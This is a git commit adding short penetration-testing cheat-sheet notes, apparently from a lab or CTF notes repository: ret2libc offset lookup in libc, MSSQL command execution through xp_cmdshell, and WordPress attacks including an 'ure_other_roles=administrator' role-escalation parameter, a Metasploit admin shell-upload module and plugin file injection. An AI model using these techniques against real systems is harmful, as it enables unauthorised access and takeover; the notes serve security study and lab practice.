This commit is contained in:
Stefan Friese 2021-12-12 00:54:07 +01:00
parent 512b365a34
commit edb74c88ef
3 changed files with 44 additions and 0 deletions

View File

@ -0,0 +1,13 @@
# Ret2libc
## Finding offsets
* On target find `sh` address inside libc
```sh
strings -a -t x /lib32/libc.so.6 | grep /bin/sh
```
* Sub from `system` address from inside libc
```sh
readelf -s /lib32/libc.so.6 | grep system
```

9
exploit/sqli/mssql.md Normal file
View File

@ -0,0 +1,9 @@
# MSSQL
# Usage
* `sqsh` as a shell
* After connection is established check `xp_cmdshell'
```sh
xp_cmdshell 'whoami';
```

22
exploit/web/wordpress.md Normal file
View File

@ -0,0 +1,22 @@
# Wordpress
## ure_user_roles
* [exploitdb 44595](https://exploit-db.com/exploits/44595.)
* [windsordeveloper](https://windsorwebdeveloper.com/dc-6-vulnhub-walkthrough/)
* Update user profile and append POST parameter to gain administrator role on user
```sh
&ure_other_roles=administrator
```
## Shell Upload
* Msfconsole
```sh
exploit/unix/webapp/wp_admin_shell_upload
```
## Template & Plugin Editing
* If template injection does not work, use plugin injection on `akismet.php`